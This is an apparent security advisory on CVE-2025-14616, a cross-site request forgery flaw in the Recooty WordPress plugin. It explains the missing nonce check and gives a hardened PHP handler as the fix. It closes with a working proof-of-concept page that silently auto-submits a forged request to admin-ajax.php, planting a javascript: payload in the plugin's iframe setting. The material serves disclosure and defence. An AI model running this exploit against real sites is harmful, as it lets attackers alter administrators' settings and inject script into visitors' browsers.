Atomic Edge analysis of CVE-2025-14616 (metadata-based):
This vulnerability is a Cross-Site Request Forgery (CSRF) flaw in the Recooty – Job Widget (Old Dashboard) WordPress plugin versions up to and including 1.0.6. The vulnerability allows unauthenticated attackers to change the plugin’s ‘recooty_key’ option and inject malicious content into iframe src attributes by tricking an administrator into clicking a malicious link. The CVSS score of 4.3 (Medium) reflects the requirement for user interaction and the limited integrity impact.
Atomic Edge research identifies the root cause as missing nonce validation on the recooty_save_maybe() function. In WordPress, AJAX handlers and admin POST endpoints must verify a unique, user-specific nonce token to ensure requests originate from the intended user session. The plugin’s function lacks this verification. This conclusion is inferred from the CWE-352 classification and the description stating ‘missing nonce validation.’ Without access to source code, Atomic Edge cannot confirm the exact function signature or hook registration.
Exploitation requires an attacker to craft a forged HTTP request and trick a logged-in administrator into submitting it. The attack vector is likely a POST request to the WordPress admin AJAX handler (/wp-admin/admin-ajax.php) or the admin-post.php endpoint. The action parameter would be ‘recooty_save_maybe’ based on the function name. The payload would contain POST parameters to update the ‘recooty_key’ option with attacker-controlled data, which is then unsafely output within an iframe src attribute.
Remediation requires adding proper nonce verification to the recooty_save_maybe() function. The developer should use the WordPress wp_verify_nonce() function to check a valid nonce token submitted with the request. The function should also implement a capability check (e.g., current_user_can('manage_options')) to ensure only authorized users can perform the action. These are standard WordPress security practices for privileged operations.
Successful exploitation allows an attacker to modify the ‘recooty_key’ option, which the description indicates is unsafely reflected into iframe src attributes. This could lead to stored Cross-Site Scripting (XSS) if the iframe src accepts javascript: URIs or data: URIs. An attacker could deface the site, redirect users, or perform actions within the administrator’s context. The impact is limited to integrity (unauthorized settings change) and potential client-side attacks, not direct server compromise.
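A hardened version of the save-and-render pattern described above, written here as an added example and not taken from the plugin: the hook name wp_ajax_recooty_save_maybe, the nonce action 'recooty_save_key', the 'recooty_nonce' field and the 'recooty_key' request parameter are assumptions inferred from the advisory's function and option names.

```php
<?php
// Added example (not the plugin's code). ASSUMED: AJAX action 'recooty_save_maybe',
// request field 'recooty_key', nonce action 'recooty_save_key', nonce field 'recooty_nonce'.

// Admin-side form: emits a nonce tied to the current user session that the handler requires.
function recooty_example_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="recooty_save_maybe" />';
    wp_nonce_field( 'recooty_save_key', 'recooty_nonce' ); // adds nonce + referer hidden fields
    echo '<input type="text" name="recooty_key" value="' . esc_attr( get_option( 'recooty_key', '' ) ) . '" />';
    echo '<button type="submit">Save</button></form>';
}

// AJAX handler: nonce check, capability check, then strict validation of the stored value.
function recooty_example_save_key() {
    // 1. CSRF: check_ajax_referer() wraps wp_verify_nonce() and terminates the request on failure,
    //    so a forged cross-site POST without a valid session-bound nonce never reaches the update.
    check_ajax_referer( 'recooty_save_key', 'recooty_nonce' );

    // 2. Authorization: a valid nonce proves intent, not privilege; also require the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Validation: the value is later placed in an iframe src, so allow only http(s) URLs.
    $raw = isset( $_POST['recooty_key'] ) ? sanitize_text_field( wp_unslash( $_POST['recooty_key'] ) ) : '';
    $url = esc_url_raw( $raw, array( 'http', 'https' ) ); // returns '' for javascript:, data:, etc.
    $scheme = wp_parse_url( $url, PHP_URL_SCHEME );
    if ( '' === $url || ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        wp_send_json_error( array( 'message' => 'recooty_key must be an http(s) URL' ), 400 );
    }

    update_option( 'recooty_key', $url );
    wp_send_json_success( array( 'recooty_key' => $url ) );
}
// Registered for logged-in users only; no wp_ajax_nopriv_ hook, so anonymous requests get no handler.
add_action( 'wp_ajax_recooty_save_maybe', 'recooty_example_save_key' );

// Output: escape again at render time, since stored options may have been written by older code.
function recooty_example_render_widget() {
    $src = get_option( 'recooty_key', '' );
    if ( '' === $src ) {
        return '';
    }
    return '<iframe src="' . esc_url( $src, array( 'http', 'https' ) ) . '"></iframe>';
}
```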
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14616 - Recooty <= 1.0.6 - Cross-Site Request Forgery to Settings Update
<?php
/**
* Proof of Concept for CVE-2025-14616.
* This script generates a malicious HTML page that, when visited by a logged-in WordPress administrator,
* forges a request to update the Recooty plugin's settings.
* ASSUMPTIONS (based on metadata):
* 1. The vulnerable endpoint is /wp-admin/admin-ajax.php.
* 2. The AJAX action is 'recooty_save_maybe' (derived from function name).
* 3. The parameter controlling the 'recooty_key' option is named 'recooty_key'.
* 4. The plugin does not validate a nonce or capability in this request.
*/
$target_url = 'http://vulnerable-wordpress-site.com'; // CHANGE THIS
// The malicious value to inject into the iframe src attribute.
// This example uses a javascript: payload to demonstrate XSS potential.
$malicious_key = 'javascript:alert(document.domain)';
?>
<!DOCTYPE html>
<html>
<head>
<title>Recooty CSRF PoC</title>
</head>
<body>
<h2>CVE-2025-14616 CSRF Proof of Concept</h2>
<p>If a WordPress administrator views this page while logged into the target site, the form below will automatically submit and change the Recooty plugin's settings.</p>
<form id="exploit" action="<?php echo htmlspecialchars($target_url); ?>/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="recooty_save_maybe" />
<!-- Assumed parameter name based on option 'recooty_key' -->
<input type="hidden" name="recooty_key" value="<?php echo htmlspecialchars($malicious_key); ?>" />
<!-- Other potential parameters may be required; this is a minimal PoC based on available metadata -->
</form>
<script>
// Auto-submit the form to simulate a single click on a malicious link.
document.getElementById('exploit').submit();
</script>
</body>
</html>